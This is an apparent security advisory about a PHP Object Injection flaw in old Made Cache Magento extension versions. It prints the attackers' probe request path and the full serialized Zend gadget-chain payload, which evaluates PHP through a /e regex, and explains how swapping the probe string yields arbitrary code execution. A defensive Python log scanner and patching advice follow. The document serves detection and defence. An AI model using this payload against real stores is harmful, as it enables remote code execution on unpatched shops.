
Made Cache POI vulnerability

Old versions of Made Cache (the Magento Block Cache & Varnish extension) are vulnerable to PHP Object Injection (POI), which leads to remote code execution, because the extension passes attacker-controlled request data to unserialize(). It is fixed in this commit.

Attackers use the following request to find a vulnerable store:
GET /index.php/madecache/varnish/esi/?misc=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
Base64-decoding the misc parameter yields the following serialized PHP object (the null bytes that PHP puts around the * in protected property names are not shown, which is why, for example, *_writers is declared with length 11):
a:3:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";s:1:"x";O:8:"Zend_Log":1:{s:11:"*_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"*_eventsToMail";a:1:{i:0;i:1;}s:22:"*_layoutEventsToMail";a:0:{}s:8:"*_mail";O:9:"Zend_Mail":0:{}s:10:"*_layout";O:11:"Zend_Layout":3:{s:13:"*_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"*_matchPattern";s:7:"/(.*)/e";s:15:"*_replacement";s:14:"exit("sysmon")";}s:20:"*_inflectorEnabled";b:1;s:10:"*_layout";s:6:"layout";}s:22:"*_subjectPrependText";N;}}}}
The object graph is a gadget chain through Zend Framework classes that ship with Magento: when the unserialized Zend_Log is destroyed at the end of the request, its destructor calls shutdown() on the Zend_Log_Writer_Mail, which renders its Zend_Layout; the layout passes the script name through its inflector, here a Zend_Filter_PregReplace whose pattern /(.*)/e carries the /e modifier, so preg_replace() evaluates the replacement string exit("sysmon") as PHP. No code in the extension has to touch the object for this to fire, and the /e modifier works on the PHP 5 versions that older Magento stores run (it was removed in PHP 7.0). In the probes seen so far the replacement is exit("sysmon") or exit("MaZaYaNa"), which simply prints sysmon or MaZaYaNa and exits, so the response body tells the attacker whether the store is unpatched; once they find one, they can put any PHP code in that string.
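The request and payload above can be recognised in web-server logs without ever running unserialize(). The following is an added example, not code from the Made Cache project or from the original post: a side-effect-free parser for PHP's serialize() format that only collects class names and /e regexes, a check for the misc parameter of madecache/varnish/esi requests, and a scan over constructed combined-format access-log lines (the IPs, timestamp and log format are assumptions; PROBE is the page's payload with the null bytes restored).

```python
# Added example, not code from the Made Cache project or the original post. Detects POI
# probes against /madecache/varnish/esi in (constructed) combined-format access-log lines.
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# A PCRE string with the /e modifier ("/(.*)/e"): via Zend_Filter_PregReplace, PHP < 7 evals the replacement.
E_MODIFIER = re.compile(r"^([/#~%|!@]).*\1[a-zA-Z]*e[a-zA-Z]*$", re.S)


class PhpUnserializer:
    """Parses PHP serialize() output without instantiating anything, so it is safe on
    untrusted input. Feed it a latin-1 str so that s:<len> stays a byte count."""
    def __init__(self, data):
        self.data, self.pos, self.classes, self.e_patterns = data, 0, [], []
    def _until(self, s):  # consume up to and including the separator s
        end = self.data.index(s, self.pos)
        token, self.pos = self.data[self.pos:end], end + len(s)
        return token
    def _expect(self, s):
        if not self.data.startswith(s, self.pos):
            raise ValueError(f"expected {s!r} at {self.pos}")
        self.pos += len(s)
    def _string(self):  # <len>:"<bytes>"  -- also records any /e regex it sees
        length = int(self._until(':"'))
        value, self.pos = self.data[self.pos:self.pos + length], self.pos + length
        self._expect('"')
        if E_MODIFIER.match(value):
            self.e_patterns.append(value)
        return value
    def parse(self):  # like PHP, stops after the first value, so trailing junk hides nothing
        tag = self.data[self.pos]
        if tag == "N":
            self._expect("N;")
            return None
        self._expect(tag + ":")
        if tag in ("i", "b"):  # booleans are kept as 0/1
            return int(self._until(";"))
        if tag == "s":
            value = self._string()
            self._expect(";")
            return value
        if tag not in ("a", "O"):
            raise ValueError(f"unsupported tag {tag!r} at {self.pos}")
        into = {}
        if tag == "O":  # objects become dicts tagged with their class name
            into["__class__"] = cls = self._string()
            self.classes.append(cls)
            self._expect(":")
        count = int(self._until(":{"))
        for _ in range(count):
            key = self.parse()
            into[key] = self.parse()
        self._expect("}")
        return into


def analyze_request(url):  # None for unrelated requests, else what the misc= parameter decodes to
    parts = urlsplit(url)
    misc = parse_qs(parts.query).get("misc")
    if not parts.path.rstrip("/").endswith("/madecache/varnish/esi") or not misc:
        return None
    parser, complete = PhpUnserializer(""), False
    try:
        parser = PhpUnserializer(base64.b64decode(misc[0]).decode("latin-1"))
        parser.parse()
        complete = True
    except (ValueError, IndexError, TypeError):
        pass  # bad base64, or malformed/truncated data: still report what was seen before the error
    return {"complete": complete, "classes": parser.classes, "e_patterns": parser.e_patterns}


def scan_log(lines):  # any O: entry in misc= is a POI attempt: the extension expects a plain array
    findings = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
        result = analyze_request(m.group(1)) if m else None
        if result and result["classes"]:
            findings.append(dict(result, client=line.split(" ", 1)[0]))
    return findings


# The page's probe payload with PHP's real "\0*\0" bytes restored around protected property names.
PROBE = (
    'a:3:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";s:1:"x";O:8:"Zend_Log":1:{s:11:"\x00*\x00_writers";a:1:{i:0;'
    'O:20:"Zend_Log_Writer_Mail":5:{s:16:"\x00*\x00_eventsToMail";a:1:{i:0;i:1;}s:22:"\x00*\x00_layoutEventsToMail";a:0:{}'
    's:8:"\x00*\x00_mail";O:9:"Zend_Mail":0:{}s:10:"\x00*\x00_layout";O:11:"Zend_Layout":3:{s:13:"\x00*\x00_inflector";'
    'O:23:"Zend_Filter_PregReplace":2:{s:16:"\x00*\x00_matchPattern";s:7:"/(.*)/e";s:15:"\x00*\x00_replacement";'
    's:14:"exit("sysmon")";}s:20:"\x00*\x00_inflectorEnabled";b:1;s:10:"\x00*\x00_layout";s:6:"layout";}'
    's:22:"\x00*\x00_subjectPrependText";N;}}}}'
)


def sample_log_lines():  # constructed: one probe, one benign ESI request, one unrelated hit
    def esi(raw):
        return "/index.php/madecache/varnish/esi/?misc=" + quote(base64.b64encode(raw).decode(), safe="")
    fmt = '{} - - [10/Oct/2015:13:55:36 +0000] "GET {} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    return [fmt.format("203.0.113.7", esi(PROBE.encode("latin-1"))),
            fmt.format("198.51.100.2", esi(b'a:2:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";}')),
            fmt.format("198.51.100.3", "/index.php/catalog/product/view/id/1")]
```

scan_log(sample_log_lines()) reports only the first line, with the five Zend classes in the order they appear and the /(.*)/e pattern; the second line decodes to a plain array, which is what the extension legitimately expects, and is not flagged. Two details matter for a detector like this: string lengths are byte counts, so the decoded payload is handled as latin-1, and a parse error does not discard the class names already seen, because PHP's unserialize() stops after the first value and an attacker can append junk.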

If you use the Made Cache extension, update it to the latest version or apply the patch from this commit. More generally, never call unserialize() on request data: use json_decode() for structured parameters, or, on PHP 7 and later, at least pass array('allowed_classes' => false) so that no object can be instantiated from it.